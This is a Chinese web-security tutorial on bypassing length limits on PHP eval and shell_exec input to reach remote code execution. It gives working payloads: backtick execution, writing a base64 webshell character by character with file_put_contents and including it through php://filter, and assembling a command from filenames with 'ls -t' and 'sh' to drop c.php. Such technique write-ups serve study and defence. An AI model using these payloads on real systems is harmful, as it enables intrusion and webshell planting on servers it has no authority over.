当前位置：首页 > news >正文

RCE之突破长度限制

news 2025/11/5 11:12:48

我们在写webshell时通常会遇到过滤，但除了过滤之外还可能会有长度限制，这里就简单说一下关于RCE突破长度限制的技巧

突破16位

例如：PHP Eval函数参数限制在16个字符的情况下，如何拿到Webshell？

<?php
$param = $_REQUEST['param']; 
if (strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false) 
{eval($param);
}

常规写法基本上是param=eval($_POST[0]);或者param=$_GET[0]($_POST[1]);&0=assert&1=??

但这里过滤了eval和assert，第二种写法是绕过了waf，但长度超过了16位，也不行。

反引号

但我们知道，在linux下，反引号是可以执行命令的，所以是否可以用`$_GET[1]`作为payload?

测试成功

这种方法很简单，那有没有其他方法也可以突破限制呢？

本地文件包含

使用文件包含的方法，param=include$_GET[1];16个字符，刚好符合，但难点来了，我们要包含的文件在哪？

使用file_put_contents(N,p,8)

在php官网中可以看到file_put_contents第一个参数是文件名，第二个参数是要传入的值，第三个参数是flag，8表示向文件中追加.

所以我们使用file_put_contents将webshell进行base64编码后写入文件中，在文件包含这个文件，不就可以执行了？

那为什么要进行base64编码呢？因为filr_put_contents无法对一些特殊字符进行追加，所以这里需要进行base64的编码

上传写入文件

这里写一个<?php phpinfo();

编码之后PD9waHAgcGhwaW5mbygpOw==，因为param有长度限制，所以只能一位一位的写入

?param=$_GET[1](N,P,8);&1=file_put_contents
?param=$_GET[1](N,D,8);&1=file_put_contents
...

写入成功

包含执行

因为写入的是base64编码的值，无法直接执行，可以使用php://fileter伪协议对文件解码后执行

payload=?param=include$_GET[1]&1=php://filter/read=convert.base64-decode/resouse=N

这种方法利用难度较高，但过程是非常巧妙的

突破7位

<?php
$param = $_REQUEST['param']; 
if( strlen($param) < 8 ) 
{ echo shell_exec($param);
}

这种情况怎么办，之前最短的方法`$_GET[1]`也有10位，将webshell写入文件就更不行了，无法突破？

文件名组合

linux创建文件：

touch vim > +文件名等

那是否可以将webshell拆开放在文件名里，之后将文件名组合到一个新的文件中然后执行？

我们创建最后执行的文件命令：

 echo PD9waHAgcGhwaW5mbygpOw| base64 -d>c.php

因为含有特殊字符无法创建文件，所以这里任然需要使用base64编码

怎么组合？

ls -t 以创建时间来列出当前目录下所有文件，所以可以通过这种方式来组合，但创建文件时需要从后往前创建，同时文件列表是通过\n换行符分割的，所以我们文件名最后需要加上\\来转义

将上面的这条命令拆开创建成文件

?param=%3Ehp
?param=%3Ec.p\\
?param=%3Ed\>\\
?param=%3E\ -\\
?param=%3Ee64\\
?param=%3Ebas\\
...

文件创建成功

?param=ls -t>0
?param=sh 0

组合成文件0，并运行

成功创建c.php

直接访问c.php

成功突破7位限制